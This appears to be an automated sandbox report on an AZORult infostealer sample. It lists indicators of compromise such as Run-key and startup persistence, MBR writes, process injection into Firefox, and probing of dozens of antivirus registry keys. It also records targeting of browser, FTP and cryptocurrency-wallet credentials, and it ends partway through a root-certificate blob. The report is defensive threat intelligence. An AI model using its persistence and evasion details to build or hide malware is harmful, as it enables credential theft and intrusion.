azorult | 714822746c545d1d4e5561ce277d8e2542ddae6f591a34a0669b9af48663b8aa

System Information Discovery

Processes:

7053625.77

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	7053625.77
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	7053625.77

Drops startup file 1 IoCs

Processes:

7053625.77

description ioc process

File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Driver.url 7053625.77

description	ioc	process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Driver.url	7053625.77

Loads dropped DLL 23 IoCs

Processes:

MsiExec.exeSetup3310.tmpkk1zazd4ft2.tmpvict.tmpIBInstaller_97039.tmpvpn.tmpSetup.tmp03rmxcykcrh.tmp

pid	process
4340	MsiExec.exe
4900	Setup3310.tmp
4900	Setup3310.tmp
4536	kk1zazd4ft2.tmp
840	vict.tmp
2232	IBInstaller_97039.tmp
1056	vpn.tmp
1056	vpn.tmp
1056	vpn.tmp
1056	vpn.tmp
1056	vpn.tmp
1056	vpn.tmp
1056	vpn.tmp
1056	vpn.tmp
968	Setup.tmp
968	Setup.tmp
5176	03rmxcykcrh.tmp
5176	03rmxcykcrh.tmp
5176	03rmxcykcrh.tmp
5176	03rmxcykcrh.tmp
5176	03rmxcykcrh.tmp
5176	03rmxcykcrh.tmp
5176	03rmxcykcrh.tmp

Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
spyware

Data from Local System
T1005

Credentials in Files
T1081
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware

Data from Local System
T1005

Credentials in Files
T1081

themida 3 IoCs

Detects Themida, Advanced Windows software protection system.

themida

Processes:

resource	yara_rule
C:\ProgramData\7053625.77	themida
C:\ProgramData\7053625.77	themida
behavioral1/memory/2420-229-0x00000000012C0000-0x00000000012C1000-memory.dmp	themida

Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081

Adds Run key to start application 2 TTPs 6 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

multitimer.exe1943025.21gcttt.exe7053625.7703rmxcykcrh.tmpQH7COMMSF.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\xz3htbuph3h = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\H1LE6BSJ01\\multitimer.exe\" 1 3.1615147620.60453264dc506"	multitimer.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Windows\CurrentVersion\Run\Windows Host = "C:\\ProgramData\\Windows Host\\Windows Host.exe"	1943025.21
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\haleng = "C:\\Users\\Admin\\AppData\\Local\\Temp\\haleng.exe"	gcttt.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Windows\CurrentVersion\Run\Driver = "C:\\Users\\Admin\\AppData\\Roaming\\Sysfiles\\7053625.77"	7053625.77
Set value (str)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Windows\CurrentVersion\Run\4754135 = "\"C:\\Users\\Admin\\AppData\\Roaming\\l2jqvmywrba\\03rmxcykcrh.exe\" /VERYSILENT"	03rmxcykcrh.tmp
Set value (str)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Windows\CurrentVersion\Run\ML2MIW2OHVETQEE = "\"C:\\Program Files\\QH7COMMSFS\\QH7COMMSF.exe\""	QH7COMMSF.exe

Checks for any installed AV software in registry 1 TTPs 53 IoCs

Security Software Discovery

T1063

Processes:

multitimer.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SOFTWARE\AVAST Software\Avast	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\COMODO\CIS	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Vba32\Loader	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Doctor Web\InstalledComponents	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\AhnLab\V3IS80	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\F-Secure\Computer Security\DART	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\IKARUS\anti.virus	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\ClamWin\Version	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Doctor Web\InstalledComponents	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\AVG\AV	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\K7 Computing\K7TotalSecurity	multitimer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\a2AntiMalware	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\ClamWin\Version	multitimer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\AVP18.0.0	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\AVG\AV	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\F-Secure\Computer Security\DART	multitimer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\QHActiveDefense	multitimer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\avast! Antivirus	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Microsoft Antimalware Setup\StartMenu Microsoft Security Essentials	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\ArcaBit	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\BullGuard Ltd.\BullGuard\Main	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\ClamWin\Version	multitimer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\BavSvc	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\Doctor Web\InstalledComponents	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Avira\Antivirus	multitimer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet\Services\MBAMProtector	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Jiangmin\ComputerID	multitimer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\McProxy	multitimer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\AntiVirService	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\ESET\NOD	multitimer.exe
Key opened	\REGISTRY\MACHINE\Software\Avira\Antivirus	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\COMODO\CIS	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Sophos	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\Microsoft\Microsoft Antimalware Setup\StartMenu Microsoft Security Essentials	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Microsoft Antimalware Setup\StartMenu Microsoft Security Essentials	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\COMODO\CIS	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Fortinet\FortiClient\installed	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\AVAST Software\Avast	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\AhnLab\V3IS80	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\F-Secure\Computer Security\DART	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\ESET\NOD	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\AVG\AV	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\G Data\AntiVirenKit	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\TrendMicro\UniClient	multitimer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\McAPExe	multitimer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\DrWebAVService	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\AVAST Software\Avast	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\FRISK Software\F-PROT Antivirus for Windows	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\KasperskyLab	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\McAfee\DesktopProtection	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\AhnLab\V3IS80	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Bitdefender\QuickScan	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\ESET\NOD	multitimer.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Checks whether UAC is enabled 1 TTPs 2 IoCs

evasion trojan

System Information Discovery

Processes:

md2_2efs.exe7053625.77

description	ioc	process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	md2_2efs.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	7053625.77

Enumerates connected drives 3 TTPs 48 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

Peripheral Device Discovery

System Information Discovery

Processes:

msiexec.exemsiexec.exe

description	ioc	process
File opened (read-only)	\??\J:	msiexec.exe
File opened (read-only)	\??\K:	msiexec.exe
File opened (read-only)	\??\M:	msiexec.exe
File opened (read-only)	\??\O:	msiexec.exe
File opened (read-only)	\??\X:	msiexec.exe
File opened (read-only)	\??\T:	msiexec.exe
File opened (read-only)	\??\X:	msiexec.exe
File opened (read-only)	\??\G:	msiexec.exe
File opened (read-only)	\??\N:	msiexec.exe
File opened (read-only)	\??\T:	msiexec.exe
File opened (read-only)	\??\Y:	msiexec.exe
File opened (read-only)	\??\Z:	msiexec.exe
File opened (read-only)	\??\L:	msiexec.exe
File opened (read-only)	\??\O:	msiexec.exe
File opened (read-only)	\??\Y:	msiexec.exe
File opened (read-only)	\??\L:	msiexec.exe
File opened (read-only)	\??\R:	msiexec.exe
File opened (read-only)	\??\H:	msiexec.exe
File opened (read-only)	\??\M:	msiexec.exe
File opened (read-only)	\??\N:	msiexec.exe
File opened (read-only)	\??\Q:	msiexec.exe
File opened (read-only)	\??\A:	msiexec.exe
File opened (read-only)	\??\B:	msiexec.exe
File opened (read-only)	\??\E:	msiexec.exe
File opened (read-only)	\??\F:	msiexec.exe
File opened (read-only)	\??\W:	msiexec.exe
File opened (read-only)	\??\W:	msiexec.exe
File opened (read-only)	\??\S:	msiexec.exe
File opened (read-only)	\??\P:	msiexec.exe
File opened (read-only)	\??\U:	msiexec.exe
File opened (read-only)	\??\V:	msiexec.exe
File opened (read-only)	\??\F:	msiexec.exe
File opened (read-only)	\??\I:	msiexec.exe
File opened (read-only)	\??\P:	msiexec.exe
File opened (read-only)	\??\U:	msiexec.exe
File opened (read-only)	\??\I:	msiexec.exe
File opened (read-only)	\??\J:	msiexec.exe
File opened (read-only)	\??\K:	msiexec.exe
File opened (read-only)	\??\E:	msiexec.exe
File opened (read-only)	\??\H:	msiexec.exe
File opened (read-only)	\??\V:	msiexec.exe
File opened (read-only)	\??\Z:	msiexec.exe
File opened (read-only)	\??\B:	msiexec.exe
File opened (read-only)	\??\G:	msiexec.exe
File opened (read-only)	\??\Q:	msiexec.exe
File opened (read-only)	\??\R:	msiexec.exe
File opened (read-only)	\??\A:	msiexec.exe
File opened (read-only)	\??\S:	msiexec.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102
Looks up external IP address via web service 8 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

103 ipinfo.io
177 checkip.amazonaws.com
182 ipinfo.io
204 ipinfo.io
215 ipinfo.io
32 api.ipify.org
99 ip-api.com
101 ipinfo.io

flow	ioc
103	ipinfo.io
177	checkip.amazonaws.com
182	ipinfo.io
204	ipinfo.io
215	ipinfo.io
32	api.ipify.org
99	ip-api.com
101	ipinfo.io

Maps connected drives based on registry 3 TTPs 2 IoCs

Disk information is often read in order to detect sandboxing environments.

Query Registry

Peripheral Device Discovery

System Information Discovery

Processes:

multitimer.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum\0	multitimer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum	multitimer.exe

Writes to the Master Boot Record (MBR) 1 TTPs 3 IoCs

Bootkits write to the MBR to gain persistence at a level below the operating system.

bootkit persistence

Bootkit

T1067

Processes:

Setup.exeC0CA61A12E4C8B38.exeC0CA61A12E4C8B38.exe

description	ioc	process
File opened for modification	\??\PhysicalDrive0	Setup.exe
File opened for modification	\??\PhysicalDrive0	C0CA61A12E4C8B38.exe
File opened for modification	\??\PhysicalDrive0	C0CA61A12E4C8B38.exe

Drops file in System32 directory 2 IoCs

Processes:

powershell.exepowershell.exe

description	ioc	process
File opened for modification	C:\Windows\SysWOW64\%AppData%\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\SysWOW64\%AppData%\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

Processes:

Setup.exe7053625.77

pid process

4944 Setup.exe
2420 7053625.77

Suspicious use of SetThreadContext 4 IoCs

Processes:

key.exe2396.tmp.exeC0CA61A12E4C8B38.exe

description	pid	process	target process
PID 4440 set thread context of 4584	4440	key.exe	key.exe
PID 3824 set thread context of 4640	3824	2396.tmp.exe	2396.tmp.exe
PID 3604 set thread context of 4524	3604	C0CA61A12E4C8B38.exe	firefox.exe
PID 3604 set thread context of 4788	3604	C0CA61A12E4C8B38.exe	firefox.exe

Drops file in Program Files directory 64 IoCs

Processes:

vpn.tmpIBInstaller_97039.tmpchashepro3.tmpkk1zazd4ft2.tmpr5a4soiop3w.exevict.tmp

description	ioc	process
File created	C:\Program Files (x86)\MaskVPN\driver\winxp32\is-QULI5.tmp	vpn.tmp
File created	C:\Program Files (x86)\IBBrowserInstallerEngine\is-2O3M2.tmp	IBInstaller_97039.tmp
File created	C:\Program Files (x86)\IBBrowserInstallerEngine\is-IMGP7.tmp	IBInstaller_97039.tmp
File created	C:\Program Files (x86)\MaskVPN\is-ARSBJ.tmp	vpn.tmp
File created	C:\Program Files (x86)\MaskVPN\driver\win732\is-DPOTK.tmp	vpn.tmp
File created	C:\Program Files (x86)\MaskVPN\driver\win764\is-H66TF.tmp	vpn.tmp
File opened for modification	C:\Program Files (x86)\JCleaner\Venita.exe	chashepro3.tmp
File opened for modification	C:\Program Files (x86)\IBBrowserInstallerEngine\Borland.Studio.Refactoring.dll	IBInstaller_97039.tmp
File created	C:\Program Files (x86)\MaskVPN\driver\winxp64\is-UU469.tmp	vpn.tmp
File opened for modification	C:\Program Files (x86)\JCleaner\unins000.dat	chashepro3.tmp
File opened for modification	C:\Program Files (x86)\MaskVPN\ipseccmd.exe	vpn.tmp
File opened for modification	C:\Program Files (x86)\IBBrowserInstallerEngine\Borland.Studio.Interop.dll	IBInstaller_97039.tmp
File opened for modification	C:\Program Files (x86)\IBBrowserInstallerEngine\unins000.dat	IBInstaller_97039.tmp
File created	C:\Program Files (x86)\MaskVPN\is-EKCJO.tmp	vpn.tmp
File created	C:\Program Files (x86)\MaskVPN\is-9PLP1.tmp	vpn.tmp
File created	C:\Program Files (x86)\MaskVPN\driver\win732\is-V5B58.tmp	vpn.tmp
File created	C:\Program Files (x86)\MaskVPN\driver\win732\is-HNHPC.tmp	vpn.tmp
File created	C:\Program Files (x86)\JCleaner\is-IHPOM.tmp	chashepro3.tmp
File opened for modification	C:\Program Files (x86)\IBBrowserInstallerEngine\Borland.Globalization.dll	IBInstaller_97039.tmp
File created	C:\Program Files (x86)\MaskVPN\driver\win764\is-FKMRA.tmp	vpn.tmp
File created	C:\Program Files (x86)\IBBrowserInstallerEngine\is-F4PFV.tmp	IBInstaller_97039.tmp
File opened for modification	C:\Program Files (x86)\MaskVPN\libCommon.dll	vpn.tmp
File opened for modification	C:\Program Files (x86)\MaskVPN\libeay32.dll	vpn.tmp
File opened for modification	C:\Program Files (x86)\MaskVPN\libMaskVPN.dll	vpn.tmp
File created	C:\Program Files (x86)\MaskVPN\driver\winxp64\is-KS9CF.tmp	vpn.tmp
File created	C:\Program Files (x86)\viewerise\unins000.dat	kk1zazd4ft2.tmp
File created	C:\Program Files\QH7COMMSFS\QH7COMMSF.exe	r5a4soiop3w.exe
File opened for modification	C:\Program Files (x86)\IBBrowserInstallerEngine\Borland.Studio.Host.dll	IBInstaller_97039.tmp
File created	C:\Program Files\QH7COMMSFS\uninstaller.exe	r5a4soiop3w.exe
File created	C:\Program Files\QH7COMMSFS\uninstaller.exe.config	r5a4soiop3w.exe
File opened for modification	C:\Program Files (x86)\MaskVPN\tunnle.dll	vpn.tmp
File created	C:\Program Files (x86)\MaskVPN\is-9BCEB.tmp	vpn.tmp
File created	C:\Program Files (x86)\MaskVPN\is-MH3IN.tmp	vpn.tmp
File created	C:\Program Files (x86)\MaskVPN\is-Q7URR.tmp	vpn.tmp
File opened for modification	C:\Program Files (x86)\IBBrowserInstallerEngine\Borland.Delphi.dll	IBInstaller_97039.tmp
File created	C:\Program Files (x86)\IBBrowserInstallerEngine\is-OEP9B.tmp	IBInstaller_97039.tmp
File opened for modification	C:\Program Files (x86)\MaskVPN\MaskVPNUpdate.exe	vpn.tmp
File created	C:\Program Files (x86)\MaskVPN\is-16UCL.tmp	vpn.tmp
File created	C:\Program Files (x86)\MaskVPN\driver\win764\is-F96II.tmp	vpn.tmp
File created	C:\Program Files (x86)\MaskVPN\driver\win764\is-37HVU.tmp	vpn.tmp
File created	C:\Program Files (x86)\MaskVPN\driver\winxp32\is-MJG08.tmp	vpn.tmp
File created	C:\Program Files (x86)\JCleaner\is-N3II3.tmp	chashepro3.tmp
File created	C:\Program Files (x86)\IBBrowserInstallerEngine\is-34701.tmp	IBInstaller_97039.tmp
File created	C:\Program Files (x86)\MaskVPN\driver\win732\is-54HS3.tmp	vpn.tmp
File created	C:\Program Files (x86)\MaskVPN\driver\winxp32\is-0T2HJ.tmp	vpn.tmp
File created	C:\Program Files (x86)\MaskVPN\driver\winxp64\is-FDFOO.tmp	vpn.tmp
File opened for modification	C:\Program Files (x86)\MaskVPN\MaskVPN.exe	vpn.tmp
File created	C:\Program Files (x86)\MaskVPN\is-Q37VJ.tmp	vpn.tmp
File created	C:\Program Files (x86)\IBBrowserInstallerEngine\is-OEV0P.tmp	IBInstaller_97039.tmp
File created	C:\Program Files (x86)\IBBrowserInstallerEngine\is-R4IPI.tmp	IBInstaller_97039.tmp
File opened for modification	C:\Program Files (x86)\MaskVPN\tunnle.exe	vpn.tmp
File created	C:\Program Files (x86)\MaskVPN\unins000.dat	vpn.tmp
File created	C:\Program Files (x86)\MaskVPN\is-JI4CS.tmp	vpn.tmp
File created	C:\Program Files (x86)\MaskVPN\is-CA4CE.tmp	vpn.tmp
File opened for modification	C:\Program Files (x86)\IBBrowserInstallerEngine\Borland.Studio.Delphi.dll	IBInstaller_97039.tmp
File created	C:\Program Files (x86)\IBBrowserInstallerEngine\unins000.dat	IBInstaller_97039.tmp
File created	C:\Program Files (x86)\MaskVPN\driver\winxp64\is-KE78F.tmp	vpn.tmp
File opened for modification	C:\Program Files (x86)\viewerise\unins000.dat	kk1zazd4ft2.tmp
File opened for modification	C:\Program Files (x86)\viewerise\unins000.dat	vict.tmp
File created	C:\Program Files\QH7COMMSFS\QH7COMMSF.exe.config	r5a4soiop3w.exe
File created	C:\Program Files (x86)\MaskVPN\is-P9CN5.tmp	vpn.tmp
File created	C:\Program Files (x86)\MaskVPN\driver\winxp32\is-00I7U.tmp	vpn.tmp
File created	C:\Program Files (x86)\MaskVPN\driver\win732\is-GPUKK.tmp	vpn.tmp
File created	C:\Program Files (x86)\MaskVPN\driver\winxp32\is-15URG.tmp	vpn.tmp

Drops file in Windows directory 2 IoCs

Processes:

multitimer.exe

description	ioc	process
File created	C:\Windows\Microsoft.NET\Framework64\v2.0.50727\config\security.config.cch.new	multitimer.exe
File created	C:\Windows\Microsoft.NET\Framework64\v2.0.50727\config\enterprisesec.config.cch.new	multitimer.exe

Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Checks SCSI registry key(s) 3 TTPs 12 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

Peripheral Device Discovery

System Information Discovery

Processes:

C0CA61A12E4C8B38.exeC0CA61A12E4C8B38.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_SANU&PROD_SANU_DVD-ROM\4&37CE57BA&0&010000	C0CA61A12E4C8B38.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\DeviceDesc	C0CA61A12E4C8B38.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\FriendlyName	C0CA61A12E4C8B38.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\FriendlyName	C0CA61A12E4C8B38.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_&PROD_HEARTDISK\4&37CE57BA&0&000000	C0CA61A12E4C8B38.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\FriendlyName	C0CA61A12E4C8B38.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\DeviceDesc	C0CA61A12E4C8B38.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_SANU&PROD_SANU_DVD-ROM\4&37CE57BA&0&010000	C0CA61A12E4C8B38.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\DeviceDesc	C0CA61A12E4C8B38.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_&PROD_HEARTDISK\4&37CE57BA&0&000000	C0CA61A12E4C8B38.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\DeviceDesc	C0CA61A12E4C8B38.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\FriendlyName	C0CA61A12E4C8B38.exe

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

Processes:

2396.tmp.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	2396.tmp.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	2396.tmp.exe

Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exeschtasks.exe

pid process

6888 schtasks.exe
5880 schtasks.exe
Delays execution with timeout.exe 1 IoCs
evasion

Processes:

timeout.exe

pid process

6564 timeout.exe

pid	process
6888	schtasks.exe
5880	schtasks.exe

pid	process
6564	timeout.exe

Enumerates system info in registry 2 TTPs 2 IoCs

Query Registry

System Information Discovery

Processes:

multitimer.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	multitimer.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	multitimer.exe

Kills process with taskkill 6 IoCs
evasion

Processes:

taskkill.exetaskkill.exeTASKKILL.exetaskkill.exetaskkill.exetaskkill.exe

pid process

5988 taskkill.exe
4544 taskkill.exe
3424 TASKKILL.exe
6232 taskkill.exe
580 taskkill.exe
4620 taskkill.exe
Modifies data under HKEY_USERS 1 IoCs

Processes:

file.exe

description ioc process

Key created \REGISTRY\USER\.DEFAULT\Software\PegasPc file.exe

pid	process
5988	taskkill.exe
4544	taskkill.exe
3424	TASKKILL.exe
6232	taskkill.exe
580	taskkill.exe
4620	taskkill.exe

description	ioc	process
Key created	\REGISTRY\USER\.DEFAULT\Software\PegasPc	file.exe

Modifies system certificate store 2 TTPs 4 IoCs

evasion spyware trojan

Install Root Certificate

T1130

Modify Registry

T1112

Processes:

Setup.exefile.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\6C0CE2DD0584C47CAC18839F14055F19FA270CDD	Setup.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\6C0CE2DD0584C47CAC18839F14055F19FA270CDD\Blob = 0300000001000000140000006c0ce2dd0584c47cac18839f14055f19fa270cdd2000000001000000500500003082054c30820434a0030201020206016de34cff62300d06092a864886f70d01010b05003081aa313b303906035504030c32436861726c65732050726f78792043412028313920e58d81e69c8820323031392c204445534b544f502d424e41543131552931253023060355040b0c1c68747470733a2f2f636861726c657370726f78792e636f6d2f73736c3111300f060355040a0c08584b3732204c74643111300f06035504070c084175636b6c616e643111300f06035504080c084175636b6c616e64310b3009060355040613024e5a301e170d3030303130313030303030305a170d3438313231353039313533375a3081aa313b303906035504030c32436861726c65732050726f78792043412028313920e58d81e69c8820323031392c204445534b544f502d424e41543131552931253023060355040b0c1c68747470733a2f2f636861726c657370726f78792e636f6d2f73736c3111300f060355040a0c08584b3732204c74643111300f06035504070c084175636b6c616e643111300f06035504080c084175636b6c616e64310b3009060355040613024e5a30820122300d06092a864886f70d01010105000382010f003082010a0282010100ae86c5043ed34d99f44fa3052ea34047a7fbbe33188b1dc2ca645ca3249e85e54b4921d4998fda6a22247c32d9087d742af3bf850803ae8c1e25faad53fb8fd823b7353d9a3ac992bf917f693826c790e53a540b120b6553508ec9585e467d310bd3ef9fb61731deb522eb78f43f824b34be36782db7a8cb162cd22247b14e4c5ae633ed66542354a59971bddc59160ecdc521b4477c93ca9e624e0af00298602300f5dc368819c3cb9f02604636888276b3a498570473b5328b0834f327c34285e333da9207e12f0edbb654c8cf11e3cc7cba17a52cd7cd42c10ae095a2e4eb9d3e3f361488243f0584af40e72d6e6e182149bfb8342384f60f12e14734258d0203010001a382017430820170300f0603551d130101ff040530030101ff3082012c06096086480186f842010d0482011d138201195468697320526f6f74206365727469666963617465207761732067656e65726174656420627920436861726c65732050726f787920666f722053534c2050726f7879696e672e20496620746869732063657274696669636174652069732070617274206f66206120636572746966696361746520636861696e2c2074686973206d65616e73207468617420796f752772652062726f7773696e67207468726f75676820436861726c65732050726f787920776974682053534c2050726f7879696e6720656e61626c656420666f72207468697320776562736974652e20506c656173652073656520687474703a2f2f636861726c657370726f78792e636f6d2f73736c20666f72206d6f726520696e666f726d6174696f6e2e300e0603551d0f0101ff040403020204301d0603551d0e04160414f8d0dc54367cf794020f8b92783a5d8a91251f9f300d06092a864886f70d01010b05000382010100662271eb9d5c744c88382de98ba37320e6312104d04273a92007a8670976d6530e6347d00bbded1319bb6754f36237596095922911e3661a70354f6ba0b797a76258be7adebb8c8dbeeed977760b80271d74b2444d92f6c1337a379b73545b251de5f8812b9625abbbfaedc15f8c6c374b9b26dd0fef035185f5899d8819e689dc6db5f0babbfd637c52b1bec8011